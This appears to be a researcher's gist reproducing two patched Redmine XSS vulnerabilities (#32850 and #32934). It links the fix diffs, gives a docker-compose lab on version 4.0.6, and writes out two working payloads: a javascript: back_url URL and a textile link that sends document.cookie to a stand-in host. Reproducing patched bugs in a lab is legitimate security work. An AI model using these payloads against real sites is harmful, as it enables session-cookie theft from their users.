Redmine XSS Vulnerabilities

redmine-xss-vulnerability.md

Redmine Security

Advisories: https://www.redmine.org/projects/redmine/wiki/Security_Advisories

Let's find a POC for the following vulns:

• Persistent XSS vulnerabilities in textile inline links (#32934)
• XSS vulnerability due to missing back_url validation (#32850)

Both issues were fixed in 4.1.1 and 4.0.7.

Checking the diff between 4.0.6 and 4.0.7:

https://github.com/redmine/redmine/compare/4.0.6...4.0.7

Main fix for #32850 is here: https://github.com/redmine/redmine/compare/4.0.6...4.0.7#diff-5f3fc5e3977d242572aa1d08551f5eb557de0ccaff30370838ee9df5386ea0daR1301 Main fix for #32934 is here: https://github.com/redmine/redmine/compare/4.0.6...4.0.7#diff-7fd35a152b4d6f80a5c756100ef0ab7435852c04a2c473e9d8d0b016203b5a33R853

POC for #32850: http://localhost:8080/projects/test/time_entries/new?back_url=javascript:alert(1) then click on cancel (tested on 4.0.6) POC for #32934:

!nope.com(Click Me)!:javascript:document.location='example.com?cookie='+document.cookie)

https://www.redmine.org/projects/redmine/wiki/RedmineTextFormattingMarkdown

FYI: https://plan.io/redmine-security-scanner/

There is an official Docker image for Redmine: https://hub.docker.com/_/redmine

I used the following stack:

version: '3.1'

services:

  redmine:
    image: redmine:4.0.6
    restart: always
    ports:
      - 8080:3000
    environment:
      REDMINE_DB_MYSQL: db
      REDMINE_DB_PASSWORD: example
      REDMINE_SECRET_KEY_BASE: supersecretkey

  db:
    image: mysql:5.7
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: example
      MYSQL_DATABASE: redmine

docker-compose -f stack.yml up